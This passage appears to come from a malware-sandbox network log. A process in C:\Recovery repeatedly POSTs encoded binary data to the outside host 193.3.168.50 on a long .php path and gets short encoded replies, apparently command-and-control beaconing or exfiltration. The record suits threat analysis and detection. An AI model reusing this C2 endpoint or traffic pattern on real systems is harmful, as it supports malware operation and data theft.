Dec 4, 2024 15:46:39.962182045 CET	1012	OUT	Data Raw: 5f 58 5f 5b 5c 5a 5a 55 5a 58 51 52 55 55 5a 58 50 56 5d 58 59 5b 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _X_[\ZZUZXQRUUZXPV]XY[WI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY._/0]<(Z /!]494U9%?3 !^$=0604)=#G $],-
Dec 4, 2024 15:46:40.963120937 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:41.196679115 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49888	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:41.457849979 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:41.805912971 CET	1012	OUT	Data Raw: 5a 5c 5a 58 59 5b 5a 52 5a 58 51 52 55 53 5a 58 50 50 5d 5d 59 5f 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z\ZXY[ZRZXQRUSZXPP]]Y_WB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Z8#<#).,\4:(S-3?[0,4_3>5#G $],5
Dec 4, 2024 15:46:42.775867939 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:43.008980036 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49893	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:43.351046085 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:43.696508884 CET	1012	OUT	Data Raw: 5f 59 5f 5d 5c 59 5f 53 5a 58 51 52 55 50 5a 59 50 51 5d 53 59 52 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Y_]\Y_SZXQRUPZYPQ]SYRWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.[;6?)?#6>8<!Y79?. 0/'7>'?! <S=#G $],
Dec 4, 2024 15:46:44.625277996 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:44.864938974 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49898	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:44.461347103 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:44.808741093 CET	1888	OUT	Data Raw: 5f 5d 5f 5b 59 5c 5f 57 5a 58 51 52 55 5f 5a 5b 50 53 5d 5e 59 52 57 41 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _]_[Y\_WZXQRU_Z[PS]^YRWA^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.[;=(:(]76!.<> :+.3('8W42%'+# (U)=#G $],
Dec 4, 2024 15:46:45.702735901 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:45.937028885 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 07 33 15 2c 1c 24 3f 34 0a 3c 23 38 5e 2d 23 06 00 25 2e 31 42 32 29 2b 53 2a 14 20 00 21 2d 39 01 28 29 23 54 3c 51 3c 50 3d 02 20 58 00 1a 26 14 20 31 2c 13 2e 3a 37 00 32 3d 00 5d 26 2d 35 5a 3e 39 30 08 3f 23 34 52 25 10 08 1b 29 1d 3a 08 2d 37 39 5c 2e 2d 32 59 24 2f 2a 52 0e 17 22 0b 3d 3d 28 58 23 21 25 1e 29 21 06 06 28 3f 2b 57 27 01 22 51 34 07 25 11 24 30 17 1f 24 32 29 0f 24 28 24 01 24 3f 30 5a 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&3,$?4<#8^-#%.1B2)+S* !-9()#T<Q<P= X& 1,.:72=]&-5Z>90?#4R%):-79\.-2Y$/R"==(X#!%)!(?+W'"Q4%$0$2)$($$?0Z _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49900	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:45.135040998 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:45.496392012 CET	1012	OUT	Data Raw: 5a 5d 5a 5f 59 5f 5a 53 5a 58 51 52 55 50 5a 52 50 53 5d 5a 59 5e 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]Z_Y_ZSZXQRUPZRPS]ZY^WB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/V%X<77:^,<"!)4W.]3<3 %30B53<>#G $],
Dec 4, 2024 15:46:46.380949020 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:46.620774984 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49905	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:46.881733894 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:47.252177954 CET	1012	OUT	Data Raw: 5f 5b 5f 53 5c 5e 5a 50 5a 58 51 52 55 55 5a 5c 50 5f 5d 5e 59 5e 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _[_S\^ZPZXQRUUZ\P_]^Y^WC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.,#9\+875"].,>!*?, 83<#2!',@" >#G $],-
Dec 4, 2024 15:46:48.118787050 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:48.352654934 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49909	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:48.610959053 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:48.971380949 CET	1012	OUT	Data Raw: 5a 5c 5a 5f 5c 5b 5f 55 5a 58 51 52 55 52 5a 5f 50 5e 5d 52 59 53 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z\Z_\[_UZXQRURZ_P^]RYSWI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY./0+9[766[,<] )-37X$?3!!)$D!34R=-#G $],1
Dec 4, 2024 15:46:49.843425035 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:50.077547073 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49913	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:50.318276882 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:50.701786995 CET	1012	OUT	Data Raw: 5f 5c 5f 53 5c 5b 5f 54 5a 58 51 52 55 53 5a 5e 50 57 5d 5a 59 58 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _\_S\[_TZXQRUSZ^PW]ZYXWE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-- 5<_'46,?.4)V.8'(V#"%0.<A50(R>#G $],5
Dec 4, 2024 15:46:51.560604095 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:51.792726040 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49918	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:51.067465067 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1860 Expect: 100-continue
Dec 4, 2024 15:46:51.415153027 CET	1860	OUT	Data Raw: 5f 59 5f 5a 59 59 5a 55 5a 58 51 52 55 50 5a 58 50 57 5d 5f 59 58 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Y_ZYYZUZXQRUPZXPW]_YXWC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY._- ?_$X!%&^.?"#<-##Z3?$V40=,D5V#>#G $],
Dec 4, 2024 15:46:52.309066057 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:52.544935942 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 25 59 24 3b 24 1c 33 3c 27 52 28 1d 27 03 2c 20 23 5f 24 2d 29 42 27 2a 09 11 2a 3a 05 11 22 3e 35 03 2b 29 09 57 3f 27 33 09 29 02 20 58 00 1a 26 5d 21 32 20 5d 2e 07 33 05 31 03 3e 5d 24 03 0b 17 2a 17 3f 18 3d 20 3f 0c 25 58 3a 14 2a 0d 35 18 2f 42 35 58 39 3e 04 59 31 2f 2a 52 0e 17 22 0b 29 10 0a 5b 23 0f 3e 08 28 32 27 16 2b 3f 23 52 27 06 32 53 20 07 35 52 24 56 3a 0d 25 32 04 1d 33 5e 38 00 32 3c 20 11 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Y$;$3<'R(', #_$-)B'*:">5+)W?'3) X&]!2 ].31>]$?= ?%X:5/B5X9>Y1/R")[#>(2'+?#R'2S 5R$V:%23^82< )) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49920	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:52.032530069 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:52.385529995 CET	1012	OUT	Data Raw: 5a 5b 5f 53 5c 5a 5f 57 5a 58 51 52 55 56 5a 5d 50 50 5d 52 59 53 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z[_S\Z_WZXQRUVZ]PP]RYSWI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/!?9776.,\#-3\'Z#42)Y%-<E6 +)#G $],!
Dec 4, 2024 15:46:53.318526983 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:53.553189039 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49926	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:53.836966991 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:54.196463108 CET	1012	OUT	Data Raw: 5f 5d 5a 5f 5c 5b 5f 52 5a 58 51 52 55 55 5a 5d 50 50 5d 5f 59 53 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _]Z_\[_RZXQRUUZ]PP]_YSWH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY--0!]? 7\;,1\ :+.33]',V79Y';"V4V*#G $],-
Dec 4, 2024 15:46:55.104188919 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:55.336719036 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49930	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:55.605782986 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:55.962055922 CET	1012	OUT	Data Raw: 5a 5d 5f 52 59 5d 5a 5e 5a 58 51 52 55 5f 5a 5b 50 52 5d 52 59 59 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]_RY]Z^ZXQRU_Z[PR]RYYWC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-, &?; 5;" _?.'Y'#72)Z3X,B" <)#G $],
Dec 4, 2024 15:46:56.859836102 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:57.096868038 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49935	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:57.402442932 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:57.758950949 CET	1012	OUT	Data Raw: 5f 5f 5a 5c 59 58 5a 56 5a 58 51 52 55 52 5a 58 50 56 5d 5e 59 5f 57 41 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: __Z\YXZVZXQRURZXPV]^Y_WA^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.X/V)Y=944&6^.,[78T:;[''!">$X<#0#>=#G $],1
Dec 4, 2024 15:46:58.724240065 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:59.009778976 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49937	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:57.703408003 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:58.056073904 CET	1888	OUT	Data Raw: 5f 59 5f 53 5c 5a 5f 50 5a 58 51 52 55 5f 5a 5c 50 52 5d 53 59 5e 57 41 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Y_S\Z_PZXQRU_Z\PR]SY^WA^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY--0)\+9(46^,<1Z!)R93' 0= !V$W==#G $],
Dec 4, 2024 15:46:59.058366060 CET	25	IN	HTTP/1.1 100 Continue
